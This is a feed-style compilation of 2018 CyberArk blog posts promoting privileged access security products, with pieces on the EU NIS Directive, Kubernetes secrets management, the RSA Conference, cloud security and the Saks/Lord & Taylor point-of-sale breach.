Furthermore, while Windows 10 helps companies start the process of separating admin privilege from standard users, it is still an all or nothing proposition. This is where CyberArk Endpoint Privilege Manager can help to fill the gap left from Windows 10 and the security team’s desire to remove local admin rights from end users. CyberArk enables customers to elevate a standard user to admin on a per application basis based on a user’s role within the organization. CyberArk can also reduce and control which applications a user should be able to run in the first place. Lastly CyberArk can protect privileged credentials from being stolen, by blocking attempts to harvest credentials including those that target browsers such as Vega Stealer.

So given all this, are you willing to gamble it all on a NGAV or EDR solution to protect you from attackers? Instead layer into your endpoint security strategy a privilege management solution that can enable you to effectively implement least privilege at your endpoints to control what users can run, how they run and help stop privilege theft from occurring at all.

If you are looking for a new way to stop attackers, let CyberArk help you implement an effective endpoint security strategy today and swing the odds in your favor.

]]>
Cybersecurity 500 List: CyberArk Named Most Innovative Privileged Access Security Company https://www.cyberark.com/blog/cybersecurity-500-list-cyberark-named-innovative-privileged-access-security-company/ Fri, 18 May 2018 15:10:03 +0000 https://www.cyberark.com/?p=24747/

According to the Official 2017-2018 Cybercrime Report by Cybersecurity Ventures, cyber crime will cost the world $6 trillion annually by 2021, up from $3 trillion in 2015. With that amount of money on the line, it is believed this crime “…will be more profitable than the global trade of all major illegal drugs combined.” How’s that for perspective?

To acknowledge the strength and reach of innovative companies focused on combating this ever-present threat, CyberSecurity Ventures unveiled its Cybersecurity 500 list this week. CyberArk is ranked as the top cybersecurity vendor – specifically CyberArk is the No. 1 privileged access security company on the list and the No. 3 company overall. The influential list identifies the world’s hottest and most innovative cybersecurity companies to watch in 2018.

The Cybersecurity 500 selection criteria includes an evaluation of the company’s ability to address cybersecurity challenges in innovative ways, customer base, feedback from CISOs and decision makers, company growth and strength of the leadership team.

As organizations advance in their digital transformation, defense in depth is a necessary strategy to stay ahead of attackers and effectively protect critical information assets. The market-leading CyberArk Privileged Access Security Solution delivers a critical layer of protection against evolving security threats targeting credentials and secrets across cloud and DevOps environments and at the endpoint.

It’s an honor to be part of the company ranked alongside other industry disrupters, including Herjavec Group and KnowBe4. Sure, recognition is cool. It’s one way to know you are part of a team that’s on the right path. I know my colleagues are motivated by a mission to help protect organizations against cyber attacks and reduce risk created by privileged credentials and secrets.

Forgive the humblebrag, but this accolade comes on the heels of CyberArk’s recognition as a Cyber Defense Magazine InfoSec Award winner and an Info Security Products Guide Global Excellence Award winner. Just sayin’ it’s a good time to be at CyberArk. We are hiring too. Ok, now back to work.

]]>
May the Fourth Be With You: CyberArk Releases Privileged Access Security Solution version 10.3 https://www.cyberark.com/blog/long-time-ago-galaxy-far-far-awaythere-malicious-insider/ Fri, 11 May 2018 18:45:11 +0000 https://www.cyberark.com/?p=24576/

On the heels of “Star Wars Day” – May the 4th for the uninitiated – and just in time for the next release of the CyberArk Privileged Access Security Solution version 10.3, I’d like to make a correlation between the undisputed leader in the privileged access security market with the greatest epic space opera in film history.

It all started when a mathematician / theoretician / research scientist completed the design for the most coveted intergalactic weapon in history: the Death Star. Despite being held against his will to complete the space station, this researcher became a malicious insider of epic proportions against the Empire. During the development of this galactic super-weapon, he deliberately sabotaged its design by incorporating a weakness directly into the main reactor that had the potential to bring the starship to complete and utter ruin. Just before his untimely death, he reveals the location of the Death Star schematics, in a databank just a few clicks away in the outer rim territories of the galaxy.

At this point in the story, one cannot help but begin to question the internal policies of the Empire. The research facility was bombed by Rebel forces (bad), the entire development team responsible for the Death Star’s completion was totally wiped out (not good), and the Rebels escaped with the location of the schematics (really, really bad). In a very non-traditional fashion, Darth Vader then proceeds to slap the wrist of those responsible for the breach, which in hindsight was a huge mistake as shortly thereafter, an even bigger breach occurs. (Worst. Policy. Ever). Also, shame on Darth Vader for being so soft.

In the privileged access security universe, the databank where the schematics reside is essentially the target system to which an attacker is seeking to gain access. One can conclude that these plans for the Death Star are clearly sensitive assets given the weapons potential to destroy entire planets. Because of this, they put in place many controls to keep these plans as far away from the Rebel Alliance as possible.

Cue the Imperial March

This is the part of the story that draws even deeper parallels. A defector and former Imperial pilot of the Galactic Empire joins the Rebel Alliance and uses stolen access codes (a.k.a. privileged credentials) from an Imperial cargo ship (a.k.a. privileged account) to gain clearance through a planet-wide protective force field (a.k.a. firewall) that sits between them and the databank. Upon requesting access, there’s a bit of push back from the gate control station (a.k.a. Domain Controller) as they were not listed on the schedule (a.k.a Active Directory). The Rebels then proceed to provide the stolen clearance codes and are ultimately given access to enter the single, main gate.

Like many organizations today, the Empire invested heavily in securing their perimeter, with a planet-wide defensive shield (which presumably cost a fortune in Galactic Credits), but it neglected to consider the implications of an attack that’s launched from within. Before providing the clearance codes, the Rebels were worried about being denied access and blown to smithereens, quoting directly from the movie “…assuming the Empire hasn’t logged them (referring to the access codes) as overdue” – this is a clear indication that even the most basic of security controls in the management of privileged credentials were not in place. As a result, access to one of the Empire’s most valued assets was inadvertently provided to Rebel forces.  

Fast forward and the shield gate is destroyed, yet another set of privileged credentials are used to retrieve and exfiltrate the schematics to Rebel forces where they identify the space station’s vulnerability, and in just a few short years later, Luke Sykwalker takes it from there and (spoiler alert) blows up the Death Star.

There’s Hope Yet…

Despite being entirely based on science fiction, the attack methodologies that challenged the Empire exist for organizations today. Fortunately, we have advanced cyber security defense solutions in the real world.

The CyberArk Privileged Access Security Solution v10.3 can be used to mitigate the risk of an insider attack like the one referenced in this blog. This version features several new enterprise-ready enhancements and capabilities that:

  • Simplify and improve the ease of use with additional user interface enhancements for password management
  • Deliver optimized deployment functionality with rapid installation of individual CyberArk components as well as the automatic hardening of those components
  • Enhance CyberArk cloud security capabilities with support for Amazon Web Services CloudFormation Templates (CFTs)
  • Provide direct access to active and recorded sessions, added support for Windows 2016 Servers (LTSC) and much more!

The one feature most relevant to this story is the enhancements associated with the new CyberArk Privileged Threat Analytics user interface, which provide security operations teams with a modernized, comprehensive view of all privileged, threat-related detection and analytics. Beyond improved internal policy and basic credential management enforcement, advanced analytics capabilities would have benefited the Empire by providing granular, detailed information such as a risk severity score (see Figure 1. below). The scoring is generated automatically and an automated alert is pushed out. If used by Imperial security teams and the necessary action was taken, then the attack would have been prevented from taking place from the earliest stage in the attack chain – which all began with stolen privileged credentials.

Figure 1.  The new CyberArk Privileged Threat Analytics dashboard, integrated with Password Vault Web Access, displays a timeline of security events with associated risk scores for each activity.

Additionally, everything we do at CyberArk reinforces a ‘trust but verify’ approach that enables users to perform all of their respective tasks without the introduction of burdensome processes that could negatively impact their performance. Existing customers can read the full details in the release notes and upgrade to Version 10.3 in the CyberArk Support Vault.

Visit www.cyberark.com for more information on how to protect your Empire’s most critical resources from Rebel scum.

]]>
Preparing for the Next European Union Directive: EU NIS https://www.cyberark.com/blog/preparing-next-european-union-directive-eu-nis/ Wed, 09 May 2018 14:14:25 +0000 https://www.cyberark.com/?p=24497/

It’s fair to say the General Data Protection Regulation (GDPR) has received attention in recent months, and even more so as we creep closer to its enforcement date of May 25. It’s only a matter of time until the first major breach occurs, and then we’ll see how things shake out from an enforcement standpoint. Meanwhile, there’s exciting news for compliance jockeys like myself. Another directive from the European Parliament and the Council of the European Union is ramping up: Directive (EU) 2016/1148, also known as the “Directive on Security of Network and Information Systems (NIS).” The Directive was originally issued a few years ago and focused on measures for a “high common level of security of network and information systems across the Union.”

The effect the NIS Directive has on industry sectors is wide ranging, from energy and banking to air transport and drinking water suppliers. Implementation of the Directive is well underway with the next big milestone scheduled for May 9. Key dates also extend out for nearly five years after the transposition. The 27 articles within the Directive are riddled with compulsory legal jargon and will likely not make the list of 2018 summer beach reads. However, the European Commission did us all a favor and released a summarized memorandum highlighting the three core objectives:

  • Improved cybersecurity capabilities at the national level
  • Increased EU-level cooperation
  • Risk management and incident reporting obligations for operators of essential services and digital service providers

Improving Cyber Security at the National Level

Upon going through all of the various articles and definitions, the one word that continues to come to mind is access.  Per the NIS Directive, a security network and information system is defined by:

“..the ability of network and information systems to resist, at a given level of confidence, any action that compromises the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the related services offered by, or accessible via, those network and information systems..”

As organizations within the member states mold their security strategies to align to the Directive, incorporating the security and management of privileged access as part that strategy is critically important in the protection of networks and information systems. Unsecured secrets, privileged accounts and their associated credentials can provide an attacker with the ability to take complete control over an environment, disable systems and take down services that can impact an entire city’s population – hundreds of thousands of civilians – as shown in the Ukrainian power grid attack.

Placing controls on privileged users – both humans and machines – is a crucial step in mitigating risk against a security event that impacts critical services. Introducing the principle of least privilege, enforcing things such as multi-factor authentication and segregation of duties (SoD), and locking down the privileged access pathway to systems and applications are fundamental measures that can be implemented to resist the compromise of critical services and systems, upon which EU citizens and businesses rely.

Taking it one step further, the application of threat detection and analytics on privilege-related activity will help to prevent an attacker from comfortably navigating the network, performing reconnaissance and gaining access to the Domain Controllers where they can harvest the accounts and credentials that provide privileged access – which is exactly what the attackers did in the Ukrainian attack. Improving cyber security at the national level does not happen without the implementation of some of these security controls.

Cooperation amongst Union Member States

This part of the Directive is instrumental in successfully developing trust and confidence throughout the Union. This section defines a ‘Cooperation Group’ requiring member states to jointly implement planning, steering, share best practices, and report and assess the overall experience gained through cooperation. Of course, consistency in the interpretation of this legislation across all member states is ideal for success. The facilitation of cross-border communication and cooperation will be implemented more effectively if each member state is on the same page.

Member states such as France and Germany have already begun to release local legislation, while many others are slowly working out the final details before the transposition goes into national law later this year. Unlike GDPR, penalties for non-compliance will not be enforced at the EU level, rather directly from the member state, specifically they “shall be effective, proportionate, and dissuasive.”

In the recent CyberArk Threat Landscape Report, only about one-third of respondents from organizations based in France (29 percent) and Germany (33 percent) said they have an understanding of the Directive, which types of security incidents should be reported, and that their organization currently meets local legislation.

Similarly with GDPR, these stats are a clear indicator that organizations are not fully prepared.  The likelihood of many organizations being in a comfortable state to avoid non-compliance may be bleak.

Risk Management and Incident Reporting

Digital Service Providers (DSPs) and operators of essential services will be required to put in place technical and organizational measures to prevent risk, ensure the level of security of the network of information systems is appropriate to said risk, and effectively handle incidents to prevent and minimize the impact on the IT systems used to deliver services.

Whether data and applications are cloud native, running in a traditional on-premises environment or a combination of the two, nefarious characters and nation-state attackers continue to find ways to compromise the infrastructure and gain access to top tier resources.  Some of the definitions within the Directive are deliberately ambiguous for local interpretation – but the one thing that remains crystal clear is the management and prevention of risk begins and ends with protecting access to an organization’s most critical assets and resources.

 Achieve a Higher Level of Security for Network and Information Systems

In my younger years of questionable intelligence and irresponsibility, I was once pulled over by a police officer who asked me the standard “do you know why I’m pulling you over” question, to which I replied with a youthful response of “no.” The end result was a hefty speeding ticket and the officer informing me that “ignorance is no excuse for the law.” The same rule applies here.  Like GDPR, doing nothing in preparation for EU Directives is not only considered regulatory blasphemy, but it has the potential to result in serious reputational and financial repercussions (that undoubtedly far exceed the shame and cost of a speeding ticket that you got when you were 19 years, driving around at some ungodly speed).

For nearly two decades, the CyberArk Privileged Access Security Solution has helped customers to support compliance with numerous, both public and private, regulatory compliance and security frameworks. Partner with the #1 undisputed leader in privileged access security and achieve a higher level of security for your network and information systems. Contact us to see how we can help support your compliance program today.

]]>
Simplify and Improve Container Security Using New CyberArk Conjur Integrations with Kubernetes and Red Hat OpenShift https://www.cyberark.com/blog/simplify-improve-container-security-using-new-cyberark-conjur-integrations-kubernetes-red-hat-openshift/ Tue, 08 May 2018 15:50:36 +0000 https://www.cyberark.com/?p=24481/

This week at the Red Hat Summit, we’re introducing two new integrations that improve container security. CyberArk Conjur Enterprise now offers general availability support for the Red Hat OpenShift Container Platform and Kubernetes. This is in addition to previously announced enterprise-level support for Pivotal Cloud Foundry and Docker.

While container platforms provide some security, organizations face specific challenges for protecting the secrets and credentials needed for a containerized workflow. These challenges include:

  • Potential inadvertent exposure of secrets and other credentials
  • Limited, if any, runtime authentication processes to ensure the calling container (requesting the secret) is the correct (authenticated) application container
  • A lack of segregation of duties between different application containers as well as between the application secrets and the container platform admin
  • Limited audit trails
  • Limited, if any, rotation of secrets

Red Hat OpenShift and Kubernetes
OpenShift is a popular platform-as-a-service (PaaS) offering from Red Hat that is built on Docker and Kubernetes. Kubernetes is an open source, container-as-a-service (CaaS) project that originated from Google and appears to be emerging as the de-facto container orchestration tool. Docker is a widely used tool designed to make it easier to create, deploy and run applications by using containers. With the CyberArk Conjur integrations, enterprises can take advantage of micro-services by building powerful, secure container environments.

 Simplified Secrets Management for Containers
The integrations between OpenShift/Kubernetes and CyberArk Conjur Enterprise simplify secrets management for containers and strengthen container security in a seamless and native way. This enables organizations to more securely deploy enterprise applications at scale. For example, with these integrations, organizations using OpenShift or Kubernetes can leverage CyberArk Conjur Enterprise to secure, manage and rotate secrets and other credentials by authenticating the pods and then securely passing secrets stored in CyberArk Conjur to the application’s containers.

CyberArk Conjur Enterprise is designed to ensure secrets are never exposed to third parties, and the Conjur integration enhances security for OpenShift environments by providing:

  • End-to-end encryption of secrets through mutual TLS (Transport Layer Security).
  • Robust authentication and authorization incorporating Conjur policy, signed certificates, and an internal Kubernetes authenticator.
  • Separation of duties and other policies by letting OpenShift security teams control container access while development teams define application requirements.
  • Easy deployment of applications across environments and pods.
  • Scalability and performance advantages of the Conjur master-follower architecture. As Followers provide read-only activity for client containers and applications, scale-out is easy by simply adding more followers.
  • Secret rotation, centralized auditing, and all other advantages of Enterprise Conjur.

Ease of Use for Developers
With these integrations, developers are able to easily meet security requirements without changing their application code. CyberArk Conjur Enterprise was designed specifically for developers with the goal of empowering them to focus on development. For example, security polices can be written and managed as code using yaml files, enabling security policies to be more easily established and managed. The policy files can be checked into version control, re-used across development, test and production environments.

 True End-to-End Credential Management Across The Enterprise – No Security Islands
Another advantage of the integrations is that organizations gain policy-based secrets and credential management across their entire enterprise.  With the integration between CyberArk Conjur Enterprise and Red Hat OpenShift, the CyberArk Enterprise Password Vault enables secrets and credential managed by the CyberArk Vault to be automatically replicated into OpenShift or Kubernetes. Organizations can consistently manage access credentials and secrets across on-premises, hybrid and multi-cloud environments, as well as for OpenShift, Kubernetes, and other DevOps platforms and tools. Of course Conjur can also be used as a standalone solution that can be integrated if and when the enterprise wants to.

 Getting Started with Conjur Enterprise and OpenShift
The CyberArk Conjur Enterprise OpenShift and Kubernetes Integrations are available now. To learn more, view the on-demand OpenShift Commons Briefing: CyberArk Conjur Secrets Management demo and webinar, contact sales, or visit CyberArk.com/Conjur.  If you are at Red Hat Summit this week (May 8-11) please stop by booth #932 for a demo.

 Conjur Open Source Also Available
CyberArk Conjur Open Source is freely available for trial or download on GitHub or Conjur.org and it supports many integrations with other open source DevOps tools. Everyone using Conjur Open Source is encouraged to join the Conjur Slack channel to communicate directly with the Conjur engineering team to ask questions and provide product feedback.

]]>
Privileged Access Security Lessons Learned from My Xbox Fail https://www.cyberark.com/blog/privileged-access-security-lessons-learned-xbox-fail/ Wed, 02 May 2018 13:41:55 +0000 https://www.cyberark.com/?p=24310/

I have a 10-year-old son, who like many boys his age, enjoys playing video games on the Xbox. He is only allowed to play on the weekends, and we adhere to some general guidelines around time limits. However, this is often circumvented by the, “I just need five more minutes!” which becomes another 30 minutes if we are not careful.

So imagine my surprise when my husband’s credit card was frozen due to concerns around fraudulent charges! It turns out that the charges were not fraudulent at all; instead, my son (who was either playing the part of a malicious or uninformed insider) had made several in-game purchases. The total bill was more than two Benjamin Franklins!

Of course I knew that Xbox security and parental controls were a good idea, but I just hadn’t gotten around to using them. Big mistake. Needless to say, this incident motivated me to implement the appropriate security controls on the Xbox, including: 1) a passkey needed to start the Xbox; 2) a separate account for my son with his own user name and password; 3) time limits managed by the system—not by humans who can sometimes get distracted or lose track of time; and 4) purchases cannot be made without authorization.

In some ways, my story is similar to that of many security teams who have failed to implement best practices to address their privileged access security risks because of limited bandwidth, priorities or other reasons. Amazingly, CyberArk’s recent 2018 Global Advanced Threat Landscape Report found that nearly half (46%) of IT security professionals rarely change their security strategy substantially—even after experiencing a cyber attack. This is absolutely mind-boggling to me, especially when the risks are so high in terms of fines, lost revenue and long-term reputational damage that a company can suffer if a breach is disclosed.

My #Xbox fail taught me three lessons that can also be applied to organizations as they gear up to implement privileged access security:

  1. Ignoring the problem is not a strategy. As we all know, ignoring a problem doesn’t make it go away, and I found out the hard way when we were hit with my son’s in-app charges while gaming on the xBox.In most cases, the problem will only grow worse over time. (The Phoenix Project documents the concept of technical debt quite well.) This is especially true when it comes to managing privileged access. In fact, most organizations today have more privileged accounts, credentials and secrets to secure than ever before. Why?
  • As organizations and IT environments grow and transform in the digital era, more people and applications have access to sensitive systems and information—IT administrators of all types, privileged business users, SaaS admins and DevOps teams to name a few.
  • Regular employees with local admin privileges can unwittingly compromise systems by clicking on a link in a phishing email and installing a malicious application that steals credentials on their computer. This can set off a chain reaction (as attackers move laterally) through the organization if proper security controls are not in place.
  • There is a proliferation of non-human privileged actors. These non-human privileged actors come in the form of Service Accounts to embedded credentials in commonly deployed COTS (Commercial Off-the-Shelf) applications to credentials used by newer cloud-native applications.

Not sure of where to find all of these privileged credentials? A good place to start is with CyberArk’s free DNA Scan tool that can discover where your unmanaged privileged credentials lurk and assess your current privileged account security risks.

  1. Failing to get educated is not a strategy. I had no excuse for not getting smart on Xbox security—there was a wealth of information online, at my fingertips. This also goes for security professionals. A good resource to consider is CyberArk’s new Trustee level training. This online training is 100 percent free and available to anyone interested in learning the basics of privileged access security. You can even tune in during your commute or while working out.
  2. Being unwilling to change any aspect of BAU (Business as Usual) is not a strategy. Sure, it would be great to beef up security without changing your BAU at all. But this just isn’t reality. In my family’s case, the adjustment to BAU means that now either my husband or I have to take turns unlocking the Xbox before my son can use it. Sure, it’s an extra step, but entirely worth it to avoid another credit card conundrum.

Similarly, organizations that deploy privileged access security controls will need to adjust some of their daily routines to reduce their privileged security risk. One of our customers shared a story about dealing with heavy resistance from a colleague in IT who said the sky would literally fall if he had to make any changes to his normal routine. Interestingly, once the person finally got around to making the change (readers can speculate on how that came about), he became the biggest advocate for securing more privileged credentials leveraging CyberArk.

Now I am not going to lie and say that my son turned into the biggest advocate of our new regime, but he probably figures that it beats the alternative, which would be a total Xbox nuclear winter scenario.

So whether you’d like some more tips on Xbox security or have your own lessons to share, feel to reach out to me, @kcmestre, on Twitter.

]]>
RSA Conference 2018 – That’s a Wrap! https://www.cyberark.com/blog/rsa-conference-2018-thats-wrap/ Fri, 20 Apr 2018 19:18:06 +0000 https://www.cyberark.com/?p=24072/

With a monumental number of miles clocked while running around the RSA Conference floor and streets of San Francisco, I’m about to crash from a runner’s high. The week was jam-packed with conversations with customers, partners, peers and pioneers.

Although I didn’t get to attend all of the keynotes, the Cryptography Panel and “Five Most Dangerous Attacks” from the SANS Institute team were truly outstanding. Panelist Adi Shamir’s comment, “Velocity is a vector, but are we moving forward or backward?” was insightful and thought provoking, especially as companies aim to balance rapid innovation with security.

The “Five Most Dangerous Attacks” discussion gave an eye-opening view on how attacks are evolving. Ed Skoudis shared how attackers have advanced their techniques to stealthily gain insights by correlating data from multiple innocuous data sources. Johannes Ohullrich shared insights on a crypto-mining attack against an organization’s PeopleSoft infrastructure that netted $30K per month for the attackers—providing a greater ROI than traditional ransomware attacks would deliver. James Lynn shared that ICS attacks, once solely directed against DCS and SIS systems, now focus is on actual sensors themselves. This was especially sobering when you consider that most ICS attacks are not financially motivated.

It was certainly hard to juggle attending the keynotes and sessions with all of the great activity at the CyberArk booth. The conversations there were fast and furious and provided a wealth of insights on how prospects, customers and partners are tackling the privileged access security problem.

Introducing the CyberArk Marketplace

We kicked off the week by unveiling the CyberArk Marketplace, the industry’s broadest and deepest portfolio of integrations with a privileged access security solution. The Marketplace is a reflection of our philosophy that effective security must be a team game. Featuring a growing library of integrations with partners including Okta, SailPoint, ForeScout, Tenable and more, customers have the ability to secure privileged access across their entire technology stack—from security and IT operations to cloud, DevOps and Robotic Process Automation software. We held live demonstrations of the Marketplace throughout the week at our RSA booth, receiving positive feedback on available resources and collaborative ways to grow the platform. Take a tour if you haven’t already, and let us know what you think on Twitter!

Security Is a Team Game

Decked out in his CyberArk team jersey, our EVP of Global Business Development Adam Bosnian sat down with ForeScout Chief Strategy Officer Pedro Abreu to discuss this “team game” approach to security. I’ll share some highlights—you can watch the full interview here.

  • “Silver bullets don’t tend to work in security.” There is no one solution that solves today’s—let alone tomorrow’s—security challenges. We have a responsibility to work better together against our common enemy, the attacker.
  • “Know what you own.” After a breach, far too many organizations point to vulnerabilities or assets they never even knew existed as the culprits. The way to address this is through constant discovery of your environment. Attackers are innovative, so you have to account for every single thing connected to your network—from databases to fish tank thermometers. From there, it’s important to automate processes and integrate tools to enable seamless orchestration across your security fabric. This will help to accelerate time to response—whether that be ForeScout taking suspicious devices off the network, CyberArk shutting down the privileged pathway, or another security tool taking action.
  • “Data is the “oil” of the new economy, and machine learning is the new “combustion engine.” AI depends on rich, contextual data. Together, ForeScout and CyberArk are providing this critical threat intelligence and insight into organizations’ network security posture and the areas that are most vulnerable to attack.

Secure Privilege. Stop Attacks.

Another resounding theme at this year’s show was the integral role privileged access plays in security in the digital transformation era. To illustrate these dangers, CyberArk Labs team researchers Lavi Lazarovitz and Asaf Hecht presented an RSA talk, “Sneak Your Way to Cloud Persistence—Shadow Admins Are Here to Stay,” on new, stealthy ways to maintain persistence in public cloud platforms. Using cloud shadow admins in AWS as an example, the presentation revealed how changing just one line of IAM policy can devastate an entire environment. The team also introduced an open source scanning tool to help blue and red teams mitigate these new threats. You can check out their presentation slides and this ThreatPost article for more details.

As enterprises automate IT infrastructure and institute DevOps methodologies to accelerate innovation, processes and technologies must be put in place to secure both machine and human identities. In her RSA talk, “Rise of the Machines: DevOps and the Role of Secrets Management,” CyberArk Vice President, DevOps Security, Elizabeth Lawler shared ways to apply traditional privileged access management concepts to nonhuman network entities (processes, microservices, containers) to automate IT without compromising security or velocity. Get the details in her presentation slides and check out the CyberArk Conjur open source tool.

That’s a Wrap

As we continue to innovate and deliver industry-leading security solutions to market to help organizations better protect against advanced threats, we were honored with two prestigious industry awards during this year’s conference: Winner of Cyber Defense Magazine’s InfoSec Award for “Next Gen Privileged Account Security” and winner of the Info Security Products Guide Global Excellence Award for “Privileged Access Management.” We appreciate this recognition, and we will not rest on our laurels. Attackers never sleep, after all.

It was great to pause—to unite as an industry, with a shared goal of stopping attacks and protecting precious assets of people and businesses. But, there’s much to be done and it’s time to get back to work. Until next year, RSA Conference!

]]>
Security is a Team Game—Join the Big Leagues in CyberArk Marketplace https://www.cyberark.com/blog/security-team-game-join-big-leagues-cyberark-marketplace/ Mon, 16 Apr 2018 12:35:27 +0000 https://www.cyberark.com/?p=23969/

Today’s security and compliance environment is rapidly changing, presenting new challenges to organizations that no single solution or vendor alone can fully address. That’s why we view security as a team game and have a vested interest in creating a powerful ecosystem of partners that can provide organizations with holistic, tailored solutions to meet their evolving security needs—both today and tomorrow.

As we continue to advance our position as the global leader in privileged access security, we’re thrilled to unveil the CyberArk Marketplace, a one-stop-shop comprised of the industry’s broadest and deepest portfolio of integrations with a privileged account security solution.

Underscoring the importance of a “team game” approach, the new CyberArk Marketplace further supports our customers in building best-of-breed security fabrics within their organizations, in which components are tightly woven together and enrich one another. Organizations have invested in a security portfolio, and likewise, we have invested time and resources into developing and testing the integrations to maximize security across the enterprise with enriched, bi-directional data flowing across solutions.

The CyberArk Marketplace is designed to take the often-laborious process of developing solution integrations off of the organization’s workload. It provides unprecedented simplicity, cost-efficiencies and speed for security and IT operations teams who want to extend the benefits of securing and leveraging privileged access and data across the enterprise, in the cloud and throughout the DevOps pipeline.

With the CyberArk Marketplace, organizations benefit from:

  • Heightened visibility and awareness. Get a comprehensive look at all current CyberArk integrations and partnerships in an intuitive dashboard view that is easy to understand and share with team members across your organization.
  • Granular information—where and when you need it. The CyberArk Marketplace houses all of the technical integration components—from plugins to APIs to support tools—you need to get your integration up and running quickly.
  • Insights on tap from the larger security community. As the Marketplace grows, it will foster collaboration, engagement and bi-directional information sharing—providing a valuable resource for organizations as they progress on their security and digital transformation journeys.

As we gear up for an exiting and jam-packed week at RSA Conference, we look forward to sharing the CyberArk Marketplace with customers and partners on the show floor, hearing about your integration stories and discussing ways to collaboratively grow this new and exciting resource.

Visit the CyberArk Marketplace today  and if you’re traveling to San Francisco this week, be sure to stop by our RSA booth #4201!

Once you have taken a tour, we’d love to hear your feedback. Reach us on twitter @CyberArk.

]]>
Cloud Security Risks and Responsibilities https://www.cyberark.com/blog/cloud-security-risks-responsibilities/ Fri, 06 Apr 2018 13:38:12 +0000 https://www.cyberark.com/?p=23808/

As public cloud utilization—specifically Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service (PaaS)—continues to surge, questions around cloud security responsibility linger. Though public cloud vendors such as Amazon and Google emphasize customers’ shared responsibility in securing cloud workloads, too many organizations continue to place the onus on their infrastructure providers.

Organizations that rely solely on a cloud vendor’s built-in security potentially expose their organization to unnecessary risk and painful lessons have been learned. This is particularly true for the credentials and secrets that proliferate in cloud environments and automated processes. These secrets are dynamically created and assigned to provision, configure and manage hundreds of thousands of machines and microservices—but many are never secured. If they are compromised, these secrets and credentials can give attackers a crucial jumping-off point to achieve lateral access across networks, data and applications, and ultimately, provide access to an organization’s most critical assets.

In fact, the Cloud Security Alliance “2017 Treacherous 12” report notes insufficient identity, credential and access management as one of the top threats to enterprise cloud computing today. Without proper privileged account security in place, organizations can face potentially catastrophic damage. The report states that this can be caused by “malicious actors masquerading as legitimate users, operators or developers who can read/exfiltrate, modify and delete data…snoop on data in transit or release malicious software that appears to originate from a legitimate source.”

Underscoring this problem, our recently published Global Advanced Threat Landscape Report 2018 revealed that while 50 percent of IT professionals say their organization stores business-critical information in the cloud and 43 percent say they commit regulated customer data to the cloud, nearly half (49 percent) have no privileged account security in place for the cloud.

These findings indicate that while security teams may be comfortable with securing certain, more traditional components like the cloud admin console, when it comes to securing dynamic cloud environments, further education is critical and there is much more work to be done.

Now is the time to take ownership of your organization’s responsibility for protecting critical information in the cloud. One proactive step your organization can take to bolster its cloud security posture is to conduct Red Team exercises, in which ethical hackers simulate the techniques and behaviors of likely attackers. These exercises can help to uncover critical vulnerabilities in cloud (and on-premises) environments, identify effective responses and understand the motives and techniques of potential adversaries.

For additional information about security vulnerabilities associated with cloud-based infrastructure, download they CyberArk eBook that highlights six use cases and best practices organizations can follow to mitigate cloud risks and maintain a consistent, enterprise-wide policy throughout the cloud journey—regardless of the compute environment, development philosophy or complexity.

]]>
Saks, Lord & Taylor Breaches: Privileged Account Compromise Never Goes Out of Style https://www.cyberark.com/blog/saks-lord-taylor-breaches-privileged-account-compromise-never-goes-style/ Thu, 05 Apr 2018 20:42:22 +0000 https://www.cyberark.com/?p=23827/

Saks Fifth Avenue and Lord & Taylor became the latest victims of cyber attacks that target major retailers and their PoS systems, resulting in the potential compromise of millions of payment cards.

While details of the attack are still emerging, initial reports about the breach and subsequent confirmation from the parent company, Hudson’s Bay Company, provide enough detail to identify potential pathways the attackers took – and assess what this breach means for other retailers to prevent similar attacks.

We’ll continue to analyze details of the attack – but a few major themes jumped out initially:

More than a PoS Breach – This Was a Network Takeover

While the PoS systems may have been the ultimate target, the attackers likely traversed the Hudson’s Bay network to get there. What this means is that the attackers took some level of control and gained persistence within the company’s network.

If the PoS system itself was the attack vector, we would likely hear about more breached retailers than just Saks and Lord & Taylor.

As we’ve seen in previous PoS attacks, privileged accounts are the primary enablers of full network compromise. Attackers typically gain a foothold through phishing attacks, steal credentials from the endpoint and elevate privileges while moving laterally across the network towards the PoS systems.

Once the attacker reaches the PoS, privileged credentials can be used to exfiltrate the payment card data while avoiding detection and setting off security alarms.

Based on initial analysis of available details, Hudson’s Bay provides costly lessons to other retailers about best practices in preventing PoS breaches, including:

Employ EMV Technology – Now

The most effective mitigation technique for this attack already exists – EMV or Chip-and-Pin technology can completely eliminate the risk of card numbers being exposed. From the initial reports, the breached retailers were using outdated magnetic strip readers, which exposed card data (tracks 1 and 2 currently sold in the black markets) in the PoS system memory. While these readers are less secure, they are still very common.

Attackers know this, and have created specific memory scraping malware for this purpose (BlackPoS).

Prevent Network Jumping

Based on patterns from previous breaches, it’s likely the attackers jumped from an employee endpoint to the PoS systems – which could mean there’s a security gap that allowed this hop. Secure retail networks should always be segmented from normal networks. A failure to segment the networks is a failure of basic security best practices.

In this case, the privileged account compromise provided the attackers with network control and easy access to the PoS system.

Even in the case of proper segmentation, attackers can exploit privileged accounts to build a bridge between the networks – but these types of attacks have typically been seen by nation-states targeting critical infrastructure or financial institutions.

What It Means for Other Retailers

While we can’t be sure that the attackers took over the ENTIRE Hudson’s Bay network, we do know that they had to achieve incredibly deep reach into the network to compromise all of the Saks and Lord & Taylor PoS systems.

Deep attacks of this nature often require the company to rebuild the network to remove the attacker and regain trust in the infrastructure.

Preventing these attacks starts with requiring multifactor authentication on all privileged accounts and removing hash residuals to prevent attackers from escalating across the network.

If privileged accounts are being used on vulnerable endpoints, the attack surface will continue to expand, allowing many possible locations for attackers to build a bridge and reach PoS systems. Automating the vaulting, protection and monitoring of those credentials is critical to containing these attacks and keeping the PoS system and associated networks safe.

]]>
CyberArk and AWS: Comprehensive Enterprise-Class Security Solutions for AWS Native, Hybrid and Multi-Cloud https://www.cyberark.com/blog/cyberark-aws-comprehensive-enterprise-class-security-solutions-aws-native-hybrid-multi-cloud/ Wed, 04 Apr 2018 21:00:30 +0000 https://www.cyberark.com/?p=23804/

Organizations of all sizes continue to adopt and accelerate their move to the cloud. Amazon Web Services (AWS) is widely recognized as the leading provider of cloud services, and it’s no surprise that AWS continues to rapidly add new capabilities and services across its portfolio to facilitate organizations’ journeys to the cloud.  But, it is not just about making the journey easier; it is also about securing the cloud workloads running on AWS. To that point, CyberArk is working closely with AWS and our customers so they can take full advantage of CyberArk’s privileged account security capabilities for their AWS resident workloads.

